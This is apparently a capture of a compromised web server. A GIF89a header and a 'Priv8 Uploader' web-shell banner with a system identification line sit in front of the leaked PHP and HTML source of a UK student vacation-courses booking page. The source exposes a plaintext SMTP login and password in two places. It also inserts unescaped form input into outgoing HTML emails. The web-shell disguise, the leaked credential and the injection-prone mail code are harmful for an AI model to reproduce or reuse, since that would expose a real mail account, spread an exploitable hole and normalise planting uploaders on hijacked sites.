GIF89a;
Priv8 Uploader By InMyMine7
Linux server.abcbiz.in 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
<!DOCTYPE html>
<html lang="en">
<head>
<title>Online vacation courses 2022 </title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script type="text/javascript" src="js/bootstrap.min.js"></script>
<link rel="icon" href="images/favicon.png"/>
<link rel="stylesheet" href="css/bootstrap.min.css"/>
<link rel="stylesheet" href="css/owl.carousel.min.css"/>
<link rel="stylesheet" href="css/style.css"/>
<link rel="stylesheet" href="css/responsive.css"/>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<script>
$(document).ready(function(){
$("#mymenubtn").click(function(){
$("#mymenuNavbar").slideToggle("slow");
});
});
</script>
</head>
<body>
<div class="fixcall">
<a class="number" href="tel:00448000614395"><img src="images/blue-phone-call.png"> </a>
<a class="emailid" href="mailto:enquiry@vacationcourses.co.uk"><img src="images/email.png"> </a>
</div>
<header>
<nav class="navbar navbar-default navbar-fixed-top">
<div class="container-fluid">
<div class="navbar-header">
<button type="button" class="navbar-toggle" id="mymenubtn">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="index.html"><img src="images/logo.jpg"/></a>
</div>
<div class="collapse navbar-collapse" id="mymenuNavbar">
<ul class="nav navbar-nav navbar-right">
<li><a href="#ExploreCourses">Our Courses</a></li>
<li><a href="#On-CampusandVirtualprogrammes">On Campus</a></li>
<li><a href="#On-CampusandVirtualprogrammes">Virtual Courses</a></li>
<li><a href="#Partnership">Partnership</a></li>
<li><a href="#home">Book Now</a></li>
<li><a class="number" href="tel:00448000614395"><img src="images/blue-phone-call.png"> <span>(0044)8000614395</span></a></li>
<li><a class="emailid" href="mailto:enquiry@vacationcourses.co.uk"><img src="images/email.png"> <span>enquiry@vacationcourses.co.uk</span></a></li>
</ul>
</div>
</div>
</nav>
</header>
<section class="slider-wrap vacationcourses-sliderwrap" id="home">
<img src="images/banner0.jpg"/>
<div class="slide-text">
<div class="row">
<div class="col-sm-8 col-md-7 col-lg-8">
<div class="slide-text-dec">
<h4>Enrichment Vacation programmes in Science, Engineering, Arts, Accounting, Business, Marketing and Mathematics in summer holidays </h4>
<h1>Age group <b class="orange">12 to 22 years </b> </h1>
<h4>On campus (University of Oxford) and virtual online programmes </h4>
<ul class="banrcourses">
<li class="orange">May, July and August </li>
<li class="orange">Join 1, 2 or 4 weeks </li>
</ul>
<h4>Academic learning, hands-on workshops over weekdays with fun activities in the evenings. Explore UK excursions over weekend for our on-campus joiners </h4>
<ul class="banrcourses">
<li class="orange">Obtain “Certificate of Attainment” </li>
<li class="orange">Enhance your CV </li>
</ul>
</div>
</div>
<div class="col-sm-4 col-md-5 col-lg-4">
<div class="slider-form">
<div class="form-box">
<h4>Book Now </h4>
<?php
if(isset($_POST['send_mail_code']) && $_POST['send_mail_code'] == "Submit")
{
$success_message = "<h3>
Thanks for your Enquiry. We will touch you Soon.</h3>";
date_default_timezone_set('Etc/UTC');
$m = '
<div style="color:#333; margin:auto; width:90%; font-size:14px;">
<h4 style="color:#134c8b;">Hello '.$_REQUEST['student'].'</h4>
<p>Thanks for your Enquiry. We will touch you Soon.</p>
<p>Thanks </p>
<p>Vacationcourses</p>
';
$m1='
<p> Hello Vacationcourses, </p>
<p>Name : '.$_POST['student'].' </p>
<p>Email : '.$_POST['email1'].' </p>
<p>Phone : '.$_POST['phone1'].' </p>
<p>Year Group : '.$_POST['year'].' </p>
';
require_once('mail/PHPMailerAutoload.php');
//Create a new PHPMailer instance
$mail = new PHPMailer;
$mail->isSMTP(); // using SMTP protocol
$mail->Host = 'mail.liveshost.com'; // SMTP host as gmail
$mail->SMTPAuth = true; // enable smtp authentication
$mail->Username = 'mail@liveshost.com'; // sender gmail host
$mail->Password = 'admin@$2020$#'; // sender gmail host password
$mail->SMTPSecure = 'ssl'; // for encrypted connection
$mail->Port = 465; // port for SMTP
$mail->isHTML(true);
$mail->setFrom('enquiry@vacationcourses.co.uk','Vacationcourses');
$mail2=clone $mail;
$mail->addAddress($_POST['email1'],'Vacationcourses');
$mail->Subject = 'Thank you from Vacationcourses';
$mail->msgHTML($m);
//send the message, check for errors
if (!$mail->send()) {
echo "Mailer Error: " . $mail->ErrorInfo;
}
$as='enquiry@vacationcourses.co.uk';
$mail2->addAddress($as,'Vacationcourses');
$mail2->Subject = 'Interest from Vacationcourses';
$mail2->msgHTML($m1);
if (!$mail2->send()) {
echo "Mailer Error: " . $mail2->ErrorInfo;
}
else
{
?>
<script>
//alert("Thank you. Your information has been send to us.");
</script>
<?php
//header("location:contact.php?msg=success");
}
}
?>
<?php if(isset($success_message)) { ?>
<div class="demo-success"><?php echo $success_message; ?></div>
<br/>
<?php } ?>
<form method="post">
<div class="form-group">
<input type="text" class="form-control form-ctrl" placeholder="Student name" name="student" maxlength="128" pattern="[a-zA-Z ]+" title="Please enter text only" required>
</div>
<div class="form-group">
<select class="form-control form-ctrl select-ctrl" name="year" title="Please select atleast one option" required>
<option value="">Select Courses </option>
<option value="Emerging Entrepreneurs">Emerging Entrepreneurs </option>
<option value="Emerging Medics">Emerging Medics </option>
<option value="Emerging Dentists">Emerging Dentists </option>
<option value="Emerging Scientists">Emerging Scientists </option>
<option value="Emerging Engineers">Emerging Engineers </option>
<option value="Emerging Accountants">Emerging Accountants </option>
<option value="Emerging Mathematicians & Statisticians">Emerging Mathematicians & Statisticians </option>
<option value="Emerging Photographers & Actors">Emerging Photographers & Actors </option>
</select>
<div class="form_icon"><i class="fa fa-angle-down"></i></div>
</div>
<div class="form-group">
<input type="text" class="form-control form-ctrl" placeholder="Email" name="email1" pattern="[a-z0-9]+@[a-z]+\.[a-z]{2,3}" title="Please enter valid email id" required>
</div>
<div class="form-group">
<input type="text" class="form-control form-ctrl" placeholder="Contact number" name="phone1" title="Please enter valid contact number" pattern="^[0-9]{10}$" required>
</div>
<div class="form-group">
<input type="submit" class="btn btn-primary btn-block" name='send_mail_code' value="Submit">
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</section>
<section class="wrap" id="On-CampusandVirtualprogrammes">
<div class="container">
<div class="row">
<div class="col-md-10 col-md-offset-1">
<div class="title text-center">
<h2> Get an experience of a <br/><b>life time, learn</b> and be <b>global, </b> make your <b>vacation meaningful!</b></h2>
</div>
</div>
</div>
<div class="row">
<div class="col-sm-7 col-md-7 col-lg-6">
<div class="info-box mt30">
<div class="text">
<h4> Main highlights On-Campus </h4>
<ul>
<li> Conducted at the University of Oxford campuses. </li>
<li> Accommodation at the University of Oxford Dormitory. </li>
<li> Enrich your holidays in May, July and August for 1, 2 or 4 weeks. </li>
<li> Learn and fun with our holiday programmes. </li>
<li> Jam packed weekday with academic learning with hands-on workshops, evenings filled with fun activities and weekend excursions. </li>
<li> Hands – on Workshops adding valuable work experience. </li>
<li> Enhance your CV and achieve <b class="orange">“Certificate of Attainment”</b>. </li>
</ul>
</div>
</div>
</div>
<div class="col-sm-5 col-md-5 col-lg-6">
<div class="info-box mt30">
<div class="text">
<h4> Main highlights of Virtual programmes </h4>
<ul>
<li> Online vacation courses.</li>
<li> Live and interactive sessions.</li>
<li> NOT pre-recorded lectures or materials.</li>
<li> Experienced Lecturers and outstanding well-designed courses.</li>
<li> At comfort of your home. </li>
<li> Sessions provided using advanced software access available to course materials anytime after enrolment. </li>
</ul>
</div>
</div>
</div>
</div>
</div>
</section>
<section class="wrap" id="ExploreCourses">
<div class="container">
<div class="title text-center">
<h2>Explore <b>our Courses</b></h2>
</div>
<div class="ExploreCourses-box">
<div class="row">
<div class="col-sm-5 col-md-4 col-lg-4">
<ul class="nav courses-nav-pills">
<li class="active"><a data-toggle="tab" href="#courses-navtab">Emerging Entrepreneurs</a></li>
<li><a data-toggle="tab" href="#courses-navtab0">Emerging Medics </a></li>
<li><a data-toggle="tab" href="#courses-navtab1">Emerging Dentists</a></li>
<li><a data-toggle="tab" href="#courses-navtab2">Emerging Scientists</a></li>
<li><a data-toggle="tab" href="#courses-navtab3">Emerging Engineers</a></li>
<li><a data-toggle="tab" href="#courses-navtab4">Emerging Accountants</a></li>
<li><a data-toggle="tab" href="#courses-navtab5">Emerging Mathematicians & Statisticians</a></li>
<li><a data-toggle="tab" href="#courses-navtab6">Emerging photographers & actors</a></li>
</ul>
</div>
<div class="col-sm-7 col-md-8 col-lg-8">
<div class="tab-content">
<div id="courses-navtab" class="tab-pane fade in active">
<div class="dec-box">
<div class="row">
<div class="col-sm-8 col-lg-8">
<h4>Emerging Entrepreneurs </h4>
<p>Our innovative online entrepreneurship course is designed for the students wishing to pursue their career into business, marketing and finance. We aim to introduce students with the real - work based scenarios in understanding the practicalities in business and finance. Students can enhance their knowledge by this session and understand the various solutions to financial problems. </p>
</div>
<div class="col-sm-4 col-lg-4">
<img src="images/vacation-courses-img.png" class="img-responsive"/>
</div>
</div>
</div>
</div>
<div id="courses-navtab0" class="tab-pane fade">
<div class="dec-box">
<div class="row">
<div class="col-sm-8 col-lg-8">
<h4>Emerging Medics </h4>
<p>Our medic programme is designed for students wishing to pursue their career as future Doctors. Our aim is to provide the students with a real – life exposure of practicing as a Doctor. Experience what medical school will be like with hands – on sessions in handling patients’ data, diagnosing diseases and using various medical instruments. Learn different cases within various body systems from experienced practicing doctors & surgeons. </p>
</div>
<div class="col-sm-4 col-lg-4">
<img src="images/vacation-courses-img0.png" class="img-responsive"/>
</div>
</div>
</div>
</div>
<div id="courses-navtab1" class="tab-pane fade">
<div class="dec-box">
<div class="row">
<div class="col-sm-8 col-lg-8">
<h4>Emerging Dentists </h4>
<p>This course is aimed for students who would like to pursue their career in dentistry. We aim to provide sessions packed with latest technological advances in dentistry. These courses are focused on the anatomy, examination and use of instruments in dentistry. Hands - on experience with dentists in UK will provide with consolidation on the sessions. </p>
</div>
<div class="col-sm-4 col-lg-4">
<img src="images/vacation-courses-img1.png" class="img-responsive"/>
</div>
</div>
</div>
</div>
<div id="courses-navtab2" class="tab-pane fade">
<div class="dec-box">
<div class="row">
<div class="col-sm-8 col-lg-8">
<h4>Emerging Scientists </h4>
<p>This course aims to provide students with flavour in various disciplines in biomedical sciences such as microbiology, biochemistry, transfusion sciences etc. Latest technological advances in biomedical sciences with hands-on experiences in measuring blood samples for various pathologies in the blood will be provided. We aim to provide students with an understanding to the latest biotechnological advances and nanotechnology to understand the drug chemistry. We aim to provide sessions led by pharmacists and top consultants from pharma industries in the UK.</p>
</div>
<div class="col-sm-4 col-lg-4">
<img src="images/vacation-courses-img2.png" class="img-responsive"/>
</div>
</div>
</div>
</div>
<div id="courses-navtab3" class="tab-pane fade">
<div class="dec-box">
<div class="row">
<div class="col-sm-8 col-lg-8">
<h4>Emerging Engineers </h4>
<p>In our Engineering vacation courses, we offer broad range of specialties. Each of these specialties has many innovative and exciting avenues to be explored. From Mechanical to civil, chemical and electrical engineering, we aim to offer students insight to the frontiers in pursuing engineering field for their academic future. </p>
</div>
<div class="col-sm-4 col-lg-4">
<img src="images/vacation-courses-img3.png" class="img-responsive"/>
</div>
</div>
</div>
</div>
<div id="courses-navtab4" class="tab-pane fade">
<div class="dec-box">
<div class="row">
<div class="col-sm-8 col-lg-8">
<h4>Emerging Accountants </h4>
<p>This intriguing course is aimed for students interested in using accounts in business and pursuing their careers as Accountants. The course will highlight the standards, the ethics, and presentation of accounts in a business report or financial statement such as an income statement or a balance sheet. It will build a base to the stocks and how in an organization the stocks are publicly traded.</p>
</div>
<div class="col-sm-4 col-lg-4">
<img src="images/vacation-courses-img4.png" class="img-responsive"/>
</div>
</div>
</div>
</div>
<div id="courses-navtab5" class="tab-pane fade">
<div class="dec-box">
<div class="row">
<div class="col-sm-8 col-lg-8">
<h4>Emerging Mathematicians & Statisticians </h4>
<p>This program of coaching and investigation covers the ever-expansive arenas of applied mathematics, pure mathematics and statistics. Special attention is placed on the integration of mathematics and statistics into your undergraduate and postgraduate studies and research. The objective of this course is to familiarize you to basic statistics.</p>
</div>
<div class="col-sm-4 col-lg-4">
<img src="images/vacation-courses-img5.png" class="img-responsive"/>
</div>
</div>
</div>
</div>
<div id="courses-navtab6" class="tab-pane fade">
<div class="dec-box">
<div class="row">
<div class="col-sm-8 col-lg-8">
<h4>Emerging Photographers & Actors </h4>
<p>We firmly believe blending both arduous acute study of cultural forms and methodical visual practice and use this to articulate learning. More significantly, we embrace that acute study and logical engagement with a wide range of ancient and cultural expressions of theatre, dance, and performance can make for more vital and important art. </p>
</div>
<div class="col-sm-4 col-lg-4">
<img src="images/vacation-courses-img6.png" class="img-responsive"/>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<section class="wrap bg-gray" id="Countries">
<div class="container-fluid">
<div class="title text-center">
<h2>Students joined from <b> Countries</b></h2>
</div>
<ul class="list-inline text-center countries-list">
<li>
<div class="countries-box">
<img src="images/countries-img.jpg"/>
<h5>Singapore</h5>
</div>
</li>
<li>
<div class="countries-box">
<img src="images/countries-img0.jpg"/>
<h5>Dubai</h5>
</div>
</li>
<li>
<div class="countries-box">
<img src="images/countries-img1.jpg"/>
<h5>Kuwait</h5>
</div>
</li>
<li>
<div class="countries-box">
<img src="images/countries-img2.jpg"/>
<h5>Saudi Arabia</h5>
</div>
</li>
<li>
<div class="countries-box">
<img src="images/countries-img3.jpg"/>
<h5>USA</h5>
</div>
</li>
<li>
<div class="countries-box">
<img src="images/countries-img4.jpg"/>
<h5>Mexico</h5>
</div>
</li>
<li>
<div class="countries-box">
<img src="images/countries-img5.jpg"/>
<h5>India</h5>
</div>
</li>
<li>
<div class="countries-box">
<img src="images/countries-img6.jpg"/>
<h5>China</h5>
</div>
</li>
</ul>
</div>
</section>
<section class="wrap partnership-wrap" id="Partnership">
<div class="container">
<div class="title text-center">
<h2>Our <b> Partnership</b></h2>
</div>
<div class="row text-center">
<div class="col-sm-12 col-md-10 col-md-offset-1 col-lg-8 col-lg-offset-2">
<div class="dec-box">
<p>We are always happy to welcome schools, colleges, academic institution, educators, non-profit organisations to collaborate with us. We welcome corporate institutions and can create customised programmes to suit to your institutions needs. </p>
<p>We are always happy to hear from institutions with new proposal in academic development and to offer our students the best experience.</p>
</div>
</div>
</div>
</div>
</section>
<section class="wrap testimonial-section" id="Testimonial">
<div class="container">
<div class="row">
<div class=" col-xs-12 col-sm-12 col-md-4 col-lg-4">
<div class="testimonial-head">
<h6># Testimonial</h6>
</div>
</div>
<div class=" col-xs-12 col-sm-12 col-md-8 col-lg-8">
<div class="testimonial-txt">
<img src="images/testimonial-icon.png" alt="">
<p>“Drew is thoroughly enjoying everything about the program! He has been super excited and has sent us so many photos when he is a very shy person otherwise. He is very pleased with the hands- on exposure that is unique to your courses. He finds it very useful in grasping...<a href="testimonial.html#testi1">more <i class="fa fa-angle-right"></i></a></p>
<div class="customer-txt">
<h5><span><img src="images/testimonial-img.png" alt=""></span> <span>Parent from</span> Japan, 2019</h5>
</div>
</div>
</div>
<div class="col-xs-12 col-sm-12 col-md-8 col-lg-8">
<div class="testimonial-txt">
<img src="images/testimonial-icon.png" alt="">
<p>"Sri has been inspired with the Medical teaching and stimulations; she has expressed strong interest of becoming a Doctor. We are very happy that a hands-on approach was used which has given Sri a perspective to the tasks involved in Medicine. We both are practicing Physicians...<a href="testimonial.html#testi2">more <i class="fa fa-angle-right"></i></a> </p>
<div class="customer-txt">
<h5><span><img src="images/testimonial-img.png" alt=""></span> <span>Parent from</span> Singapore, 2019</h5>
</div>
</div>
</div>
<div class="clearfix"></div>
<div class="col-xs-12 col-sm-12 col-md-4 col-lg-4 hidden-sm hidden-xs">
<div class="testimonial-head">
<a class="" href="testimonial.html">View All Testimonials <i class="fa fa-long-arrow-right"></i></a>
</div>
</div>
<div class=" col-xs-12 col-sm-12 col-md-8 col-lg-8">
<div class="testimonial-txt">
<img src="images/testimonial-icon.png" alt="">
<p>“Jaz has had an experience of his life-time. He has been very pleased to be given award for his performance at the Vacation courses. We are very proud of his achievement and are pleased to inform that due to this award from Oxford he has now been offered higher education in Boston...<a href="testimonial.html#testi3">more <i class="fa fa-angle-right"></i></a></p>
<div class="customer-txt">
<span><img src="images/testimonial-img.png" alt=""></span>
<h5> <span>Parent from</span> India, 2018</h5>
</div>
</div>
</div>
<div class="col-xs-12 col-sm-12 col-md-4 col-lg-4 hidden-md hidden-lg hidden-xl">
<div class="testimonial-head">
<a class="" href="testimonial.html">View All Testimonials <i class="fa fa-long-arrow-right"></i></a>
</div>
</div>
</div>
</div>
</section>
<section class="wrap Courses-contact" id="contact">
<div class="container">
<div class="title text-center">
<h2>Contact <b>Us</b></h2>
</div>
<div class="row">
<div class="col-sm-10 col-sm-offset-1 col-md-10 col-md-offset-1">
<div class="contact-box">
<div class="contact-form">
<h4 class="text-center">Express your interest, Book now </h4>
<?php
if(isset($_POST['send_mail_code1']) && $_POST['send_mail_code1'] == "Submit")
{
$success_message = "<h3>Thanks for your Enquiry. We will touch you Soon.</h3>";
date_default_timezone_set('Etc/UTC');
$m = '
<div style="color:#333; margin:auto; width:90%; font-size:14px;">
<h4 style="color:#134c8b;">Hello '.$_REQUEST['student'].'</h4>
<p> Thanks for your Enquiry. We will touch you Soon.</p>
<p>Thanks </p>
<p>Vacationcourses</p>
';
$m1='
<p> Hello Vacationcourses, </p>
<p>Name : '.$_POST['student'].' </p>
<p>Email : '.$_POST['email1'].' </p>
<p>Phone : '.$_POST['phone1'].' </p>
<p>Course : '.$_POST['year'].' </p>
<p>State : '.$_POST['state'].' </p>
<p>Country : '.$_POST['country'].' </p>
';
require_once('mail/PHPMailerAutoload.php');
//Create a new PHPMailer instance
$mail = new PHPMailer;
$mail->isSMTP(); // using SMTP protocol
$mail->Host = 'mail.liveshost.com'; // SMTP host as gmail
$mail->SMTPAuth = true; // enable smtp authentication
$mail->Username = 'mail@liveshost.com'; // sender gmail host
$mail->Password = 'admin@$2020$#'; // sender gmail host password
$mail->SMTPSecure = 'ssl'; // for encrypted connection
$mail->Port = 465; // port for SMTP
$mail->isHTML(true);
$mail->setFrom('enquiry@vacationcourses.co.uk','Vacationcourses');
$mail2=clone $mail;
$mail->addAddress($_POST['email1'],'Vacationcourses');
$mail->Subject = 'Thank you from Vacationcourses';
$mail->msgHTML($m);
//send the message, check for errors
if (!$mail->send()) {
echo "Mailer Error: " . $mail->ErrorInfo;
}
$as='enquiry@vacationcourses.co.uk';
$mail2->addAddress($as,'Vacationcourses');
$mail2->Subject = 'Interest from Vacationcourses';
$mail2->msgHTML($m1);
if (!$mail2->send()) {
echo "Mailer Error: " . $mail2->ErrorInfo;
}
else
{
?>
<script>
//alert("Thank you. Your information has been send to us.");
</script>
<?php
//header("location:contact.php?msg=success");
}
}
?>
<?php if(isset($success_message)) { ?>
<div class="demo-success"><?php echo $success_message; ?></div>
<br/>
<?php } ?>
<form method="post">
<div class="row">
<div class="col-sm-6">
<div class="form-group">
<input type="text" class="form-control form-ctrl" placeholder="Your Name" name="student" maxlength="128" pattern="[a-zA-Z ]+" title="Only letters and space allowed" required/>
</div>
</div>
<div class="col-sm-6">
<div class="form-group">
<input type="text" class="form-control form-ctrl" placeholder="Your Email" name="email1" pattern="[a-z0-9]+@[a-z]+\.[a-z]{2,3}" title="Please enter valid email id" required/>
</div>
</div>
</div>
<div class="row">
<div class="col-sm-6">
<div class="form-group">
<input type="text" class="form-control form-ctrl" placeholder="Mobile No." name="phone1" title="Please enter valid contact number" pattern="^[0-9]{10}$" required/>
</div>
</div>
<div class="col-sm-6">
<div class="form-group">
<select class="form-control form-ctrl select-ctrl" name="year" title="Please select atleast one option" required>
<option value="">Select Courses </option>
<option value="Emerging Entrepreneurs">Emerging Entrepreneurs </option>
<option value="Emerging Medics">Emerging Medics </option>
<option value="Emerging Dentists">Emerging Dentists </option>
<option value="Emerging Scientists">Emerging Scientists </option>
<option value="Emerging Engineers">Emerging Engineers </option>
<option value="Emerging Accountants">Emerging Accountants </option>
<option value="Emerging Mathematicians & Statisticians">Emerging Mathematicians & Statisticians </option>
<option value="Emerging Photographers & Actors">Emerging Photographers & Actors </option>
</select>
<div class="form_icon"><i class="fa fa-angle-down"></i></div>
</div>
</div>
</div>
<div class="row">
<div class="col-sm-6">
<div class="form-group">
<input type="text" class="form-control form-ctrl" placeholder="Your State" name="state" maxlength="128" pattern="[a-zA-Z ]+" title="Only letters and space allowed" required/>
</div>
</div>
<div class="col-sm-6">
<div class="form-group">
<input type="text" class="form-control form-ctrl" placeholder="Your Country" name="country" maxlength="128" pattern="[a-zA-Z ]+" title="Only letters and space allowed" required/>
</div>
</div>
</div>
<div class="form-group">
<textarea rows="6" class="form-control form-ctrl" placeholder="Message..." required></textarea>
</div>
<div class="btn-width">
<input type="submit" class="btn btn-primary btn-block" name='send_mail_code1' value="Submit">
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<footer>
<div class="container">
<div class="row">
<div class="col-sm-4 col-md-4 col-lg-4 fotr-box">
<div class="aap-stor">
<a href="#"><img src="images/footer-logo.png"></a>
</div>
<h3>Connect With Us</h3>
<ul class="list-inline hdr-social-link">
<li><a href="#" target="_blank"><i class="fb fa fa-facebook"></i></a></li>
<li><a href="#" target="_blank"><i class="fa fa-linkedin"></i></a></li>
<li><a href="#" target="_blank"><i class="fa fa-instagram"></i></a></li>
</ul>
</div>
<div class="col-sm-4 col-md-4 col-lg-4 fotr-box">
<h3>Contact Us</h3>
<div class="media fotr-media adress">
<div class="media-body">
<h5>Head Office</h5>
<p> Lynwood road, Aylesbury,<br/>
Buckinghamshire. HP217NF</p>
</div>
</div>
<!--<div class="media fotr-media adress">
<div class="media-body">
<h5>Branch</h5>
<p>42 Upper Berkeley St, Marylebone, London W1H 5PW, United Kingdom.</p>
</div>
</div>-->
</div>
<div class="col-sm-4 col-md-4 col-lg-4 fotr-box">
<h3>Quick Links</h3>
<ul class="list-unstyled fotr-menu">
<li><a href="#ExploreCourses">Vacation courses </a></li>
<li><a href="#On-CampusandVirtualprogrammes">On Campus </a></li>
<li><a href="#On-CampusandVirtualprogrammes">Virtual Courses</a></li>
<li><a href="#Partnership">Partnership</a></li>
<li><a href="#home">Book Now</a></li>
<li><a href="#contact">Contact Us</a></li>
</ul>
</div>
</div>
</div>
<section class="cpyrgt-wrap">
<div class="container">
<div class="row">
<div class="col-sm-8"><p>Copyrights © 2022 Vacation Courses | All Rights Reserved </p></div>
<div class="col-sm-4 txt-rgt">
<p>Powered By : <a href="https://www.b2cinfosolutions.com/" target="_blank">B2C Info Solutions</a></p>
</div>
</div>
</div>
</section>
</footer>
<!-- Modal -->
<!-- whatsapp -->
<div class="whatsap">
<a href="https://api.whatsapp.com/send?phone=9100447956939395" class="social-icon whatsapp" target="_blank">
<i class="fa fa-whatsapp"></i>
</a>
</div>
<!-- Modal end -->
<script type="text/javascript" src="js/jquery-1.12.0.min.js"></script>
<script type="text/javascript" src="js/owl.carousel.js"></script>
<script type="text/javascript" src="js/selectordie.js"></script>
<script type="text/javascript" src="js/custom.js"></script>
<script>
$('.navbar-nav li a').on("click", function () {
if($(window).width() < 767){
$(this).parents('.navbar-collapse').hide();
}
});
</script>
<script>
if( $("#service-carousel").length ) {
$("#service-carousel").owlCarousel({
loop: true,
margin: 0,
nav: true,
// navText: ["<span><img src='images/arrow_left.png'></span>", "<span><img src='images/arrow_right.png'></span>"],
dots: false,
autoplay: false,
responsive:{
0:{
items: 1
},
500:{
items: 1
},
600:{
items: 1
},
1000:{
items: 1
},
1200:{
items: 1
}
}
});
}
</script>
</body>
</html>